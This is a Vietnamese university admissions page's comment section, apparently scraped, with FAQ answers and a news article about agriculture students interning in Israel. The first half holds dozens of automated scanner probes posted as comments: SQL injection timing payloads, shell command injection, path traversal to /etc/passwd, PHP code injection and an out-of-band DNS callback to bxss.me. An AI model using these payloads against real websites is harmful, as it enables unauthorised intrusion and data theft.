    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    ‘+’A’.concat(70-3).concat(22*4).concat(106).concat(89).concat(115).concat(73)+(require’socket’ Socket.gethostbyname(‘hitqp’+’xrhpqtlue7750.bxss.me.’)[3].to_s)+’
  • wp-comments-post.php viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • '+'A'.concat(70-3).concat(22*4).concat(113).concat(85).concat(121).concat(85)+(require'socket' Socket.gethostbyname('hitte'+'kkapnfzw92eb3.bxss.me.')[3].to_s)+' viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555’||sleep(27*1000)*xchbcn||’
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    5555lda4VIk
  • 1y0dbp1A0'; waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • -1 OR 2+307-307-1=0+0+0+1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • echo sigvhf$()\ pveegp\nz^xyu||a #' &echo sigvhf$()\ pveegp\nz^xyu||a #|" &echo sigvhf$()\ pveegp\nz^xyu||a # viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    12345′”\’\”);|]*{ ”💡
  • ../../../../../../../../../../../../../../etc/passwd viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    555
  • 1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 7gdsfwOV')) OR 383=(SELECT 383 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 7sxktF7d') OR 539=(SELECT 539 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • YNWOz2ld' OR 712=(SELECT 712 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • -1)) OR 771=(SELECT 771 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • -5) OR 842=(SELECT 842 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • -5 OR 875=(SELECT 875 FROM PG_SLEEP(15))-- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • YqMzMR5b'; waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 1 waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • -1); waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • -1; waitfor delay '0:0:15' -- viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • if(now()=sysdate(),sleep(15),0) viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • -1 OR 2+778-778-1=0+0+0+1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • w3tcEX0a viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
  • W8oRPmf7′)) OR 881=(SELECT 881 FROM PG_SLEEP(15))–
  • QHcL2Y1e’ OR 460=(SELECT 460 FROM PG_SLEEP(15))–
  • -5) OR 173=(SELECT 173 FROM PG_SLEEP(15))–
  • c6lCkI6y’; waitfor delay ‘0:0:15’ —
  • 1 waitfor delay ‘0:0:15’ —
  • -1); waitfor delay ‘0:0:15’ —
  • 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
  • ${@print(md5(31337))}\ viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • ${@print(md5(31337))}\
  • 1'&&sleep(27*1000)*qmdeaw&&' viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 1’&&sleep(27*1000)*hbtsrc&&’
  • ../../../../../../../../../../../../../../windows/win.ini
  • SomeCustomInjectedHeader: injected_by_wvs viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • J1K4BenJ viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    http://bxss.me/t/xss.html?%00
  • 1 viết:
    Bình luận của bạn đang chờ kiểm duyệt. Đây là bản xem thử, bình luận sẽ chỉ hiển thị nếu được duyệt.
    1
  • Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Câu hỏi thường gặp: Học kỳ doanh nghiệp là gì? Lợi ích của Học kỳ doanh nghiệp?
    Nhà trường trả lời: Để thật sự gắn đào tạo với nhu cầu xã hội, nhà trường còn chú trọng xây dựng các chương trình liên kết đào tạo học kỳ doanh nghiệp và thực tập sinh nước ngoài. Các chương trình này giúp sinh viên không chỉ học hỏi được thêm nhiều kiến thức, thực hành tay nghề, cải thiện kỹ năng sống và trình độ ngoại ngữ mà còn giảm bớt được áp lực về tài chính. Tại các chương trình liên kết đào tạo theo chuẩn đầu ra của doanh nghiệp, thông thường sinh viên sẽ được các công ty hỗ trợ về học phí và tạo điều kiện tốt cho quá trình thực hành thực tập. Sinh viên được trải nghiệm như một người lao động tham gia sản xuất thực sự và được còn được trả lương cải thiện điều kiện tài chính cá nhân và gia đình, nhất là trong các chương trình liên kết với nước ngoài. Hoạt động này gồm 2 mãng chính là Thực tập, thực hành tại doanh nghiệp và Thực tập sinh nước ngoài.

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Câu hỏi: Vừa đăng ký xét tuyển dựa vào thi THPT và vừa xét tuyển theo hình thức học bạ có được không?
    Nhà trường trả lời:
    Thí sinh có thể vừa đăng ký xét tuyển dựa vào thi THPT và vừa muốn xét tuyển hình thức học bạ vào trường ĐHNL đều được.
    Sau khi có kết quả trúng tuyển từ 2 hình thức trên, thí sinh có thể lựa chọn 1 trong 2 hình thức để học tại trường ĐHNL.
    Hoặc nếu kết quả xét tuyển từ kỳ thi THPT không đạt, thí sinh có thể đợi kết quả xét tuyển hình thức học bạ theo quy định.
    Xem thêm Thông báo về việc nhận hồ sơ đăng ký xét tuyển theo phương thức dựa vào học bạ tại: https://tuyensinh.huaf.edu.vn/

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Trịnh Thế Anh (phải), sinh viên Trường ĐH Nông lâm – ĐH Huế, trong quá trình đi thực tập tại một nông trại bò sữa ở Israel – Ảnh: THẾ ANH
    TTO – Sau khóa thực tập, ngoài các kiến thức hữu ích học được ở nước bạn, mỗi sinh viên có thể kiếm được 100-150 triệu đồng từ quá trình làm việc thực tế ở các nông trại.

    Đó là chương trình đưa sinh viên đi thực tập tại đất nước Israel của Trường Đại học Nông Lâm (ĐHNL), Đại học Huế (ĐHH).

    Kết thúc khóa thực tập, ngoài các kiến thức hữu ích về nông nghiệp học được ở nước bạn, mỗi sinh viên có thể cầm trong tay số tiền từ 100-150 triệu đồng thu nhập từ quá trình làm việc thực tế ở các nông trại.

    Rất nhiều sinh viên sau khi hoàn thành khóa thực tập đã được các nông trại, các công ty ở Israel giữ lại để làm việc.

    Chương trình đưa sinh viên qua Israel thực tập của Trường ĐHNL, ĐHH được triển khai từ năm 2017. Khởi đầu là chương trình hợp tác đào tạo học viên Việt Nam trong lĩnh vực nông nghiệp tại Israel theo chủ trương hợp tác giữa Bộ NN&PTNT Việt Nam và Bộ Nông nghiệp Nhà nước Israel.

    Đến nay, Trường ĐHNL, ĐHH đã cử 54 sinh viên thuộc các ngành nông học, cơ khí, công nghệ thực phẩm… sang Israel thực tập.

    Bạn Trịnh Thế Anh, sinh viên Trường ĐHNL, ĐHH, người vừa hoàn thành khóa thực tập kéo dài 10 tháng từ Israel trở về, chia sẻ rằng đây không chỉ đơn thuần là một khóa thực tập để lấy điểm.

    “Qua đó bạn phải làm việc như một người nông dân thực thụ. Học được gì là phải ứng dụng ngay trên thực tế là cách mà chúng tôi được học ở Israel” – Thế Anh nói.

    Còn bạn Hồ Văn Minh Đức, sinh viên khoa cơ khí công nghệ, nói rằng mình đang ứng dụng kiến thức học được từ Israel về để áp dụng vào Dự án phân phối trà hoa sen tự nhiên ở Huế. Đức nói rằng ở Israel, người nông dân không bao giờ bán sản phẩm của mình trồng ra dưới dạng thô cho thương lái mà họ tự chế biến, tự đóng gói rồi mới bán.

    “Làm như vậy thì giá nông sản tại vườn sẽ tăng lên rất nhiều lần. Ngoài ra, nông dân ở Israel làm marketing rất tốt. Họ chủ động vừa trồng sản phẩm, vừa lo đầu ra cho sản phẩm của mình chứ không phụ thuộc thương lái như ở Việt Nam” – Đức nói.

    Điều khiến các sinh viên đặc biệt thích thú là sau khi hoàn thành khóa thực tập, mỗi sinh viên thường tích góp được 100-150 triệu đồng. Số tiền này được các chủ nông trại trả công trong quá trình sinh viên làm việc ở nông trại của họ.

    PGS.TS Lê Văn An, hiệu trưởng ĐHNL, ĐHH, cho biết những sinh viên được cử đi Israel thực tập được nhà trường lựa chọn kỹ lưỡng qua các bài phỏng vấn bằng tiếng Anh. Sinh viên được tiếp cận các công nghệ sản xuất và khoa học kỹ thuật hiện đại liên quan đến chuyên ngành đào tạo.

    “Quá trình thực tập tạo điều kiện để sinh viên tích lũy kiến thức, kỹ năng, tác phong làm việc trong môi trường quốc tế và cả tài chính, giúp các em có cơ sở để tạo sự nghiệp riêng cho bản thân” – ông An nói.

                                                                                                           Nguồn tin: tuoitre.vn

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Theo quy định của Bộ GD-ĐT, năm 2018, mỗi thí sinh chỉ được điều chỉnh đăng ký xét tuyển một  lần trong thời gian quy định và chỉ được sử dụng một trong hai phương thức: trực tuyến hoặc bằng Phiếu đăng ký xét tuyển.

    Trong thời gian thí sinh điều chỉnh nguyện vọng đăng ký xét tuyển, các trường không cập nhật, không công bố thông tin thí sinh đăng ký xét tuyển vào trường.

    Với điều chỉnh bằng phương thức trực tuyến, thí sinh sử dụng tài khoản và mật khẩu cá nhân đã được cấp để thực hiện việc điều chỉnh nguyện vọng đăng ký xét tuyển. Thí sinh lưu ý là phương thức này chỉ chấp nhận khi số lượng nguyện vọng sau khi điều chỉnh không lớn hơn số lượng nguyện vọng đã đăng ký ban đầu trong Phiếu đăng ký dự thi.

    Còn để điều chỉnh bằng Phiếu đăng ký xét tuyển, thí sinh được điều chỉnh tăng thêm số lượng nguyện vọng so với số lượng nguyện vọng đã đăng ký ban đầu trong Phiếu đăng ký dự thi và phải nộp bổ sung lệ phí cho số nguyện vọng tăng thêm theo quy định.

    Thí sinh phải điền đầy đủ thông tin vào Phiếu đăng ký xét tuyển và gửi trực tiếp về điểm thu nhận hồ sơ để cán bộ máy tính cập nhật vào cơ sở dữ liệu của Cổng thông tin tuyển sinh của Bộ GD-ĐT.

    Thí sinh cần ghi đúng mã trường, mã ngành/nhóm ngành, mã tổ hợp xét tuyển theo quy định của trường. Nguyện vọng nào ghi không đúng sẽ không được hệ thống phần mềm chấp nhận và bị loại.

    Điểm thu nhận hồ sơ phải yêu cầu thí sinh kiểm tra kết quả điều chỉnh nguyện vọng đăng ký xét tuyển trong thời gian quy định và đề nghị điều chỉnh sai sót, nếu có.

    Thí sinh thực hiện điều chỉnh nguyện vọng đăng ký xét tuyển theo phương thức trực tuyến từ 19 đến 26-7. Còn nếu thí sinh thực hiện điều chỉnh nguyện vọng đăng ký xét tuyển bằng Phiếu đăng ký xét tuyển thì thời hạn được kéo dài hơn, từ ngày 19 đến 28-7.

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.

    Nộp Hồ sơ đăng ký xét tuyển sinh đại học bằng học bạ, gồm có:

    – Phiếu ĐKXT theo mẫu CLICK VÀO ĐÂY ĐỂ TẢI PHIỂU ĐIỀN THÔNG TIN
    – Lệ phí ĐKXT: 30.000đ/1 nguyện vọng;
    – Một phong bì đã dán sẵn tem, có ghi rõ họ tên, địa chỉ, số điện thoại liên lạc của thí sinh.
    – Địa điểm nộp hồ sơ: Thí sinh có thể nộp trực tiếp hoặc gửi chuyển phát nhanh qua đường Bưu điện theo địa chỉ  theo 1 trong 2 địa chỉ sau:
    1. Ban Khảo thí & Đảm bảo chất lượng giáo dục, Đại học Huế, 01 Điện Biên Phủ, thành phố Huế, tỉnh Thừa Thiên Huế
    2. Trường Đại học Nông Lâm, Đại học Huế, 102 Phùng Hưng, thành phố Huế, tỉnh Thừa Thiên Huế

    Phiếu mẫu:

    Phong bì mẫu:

    Trả lời

    Email của bạn sẽ không được hiển thị công khai.